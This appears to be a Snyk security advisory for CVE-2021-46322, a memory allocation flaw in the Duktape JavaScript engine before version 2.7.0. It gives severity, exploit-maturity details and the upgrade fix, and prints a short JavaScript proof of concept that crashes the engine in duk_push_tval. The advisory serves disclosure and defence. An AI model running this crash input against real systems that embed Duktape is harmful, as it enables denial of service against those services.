Memory Allocation with Excessive Size Value Affecting svaarala/duktape package, versions [,2.7.0)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.06% (30th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-UNMANAGED-SVAARALADUKTAPE-9563913
  • published28 Mar 2025
  • disclosed27 Mar 2025
  • creditHopeF1y

Introduced: 27 Mar 2025

NewCVE-2021-46322  (opens in a new tab)
CWE-789  (opens in a new tab)

How to fix?

Upgrade svaarala/duktape to version 2.7.0 or higher.

Overview

Affected versions of this package are vulnerable to Memory Allocation with Excessive Size Value due to a segmentation fault in the duk_push_tval function.

PoC

function JSEtest() {
    var src = [];
    var i;

    src.push('(function test() {');
    for (i = 0; i < 1e4; i++) {
        src.push('var x' + i + ' = ' + i + ';');
    }
    src.push('var arguments = test(); return "dummy"; })');
    src = src.join('');

    var f = eval(src)(src);

    try {
        f();
    } catch (e) {
        print(e.name + ': ' + e.message);
    }

    print('still here');
}

try {
    JSEtest();
} catch (e) {
    print(e.stack || e);
}

CVSS Base Scores

version 4.0
version 3.1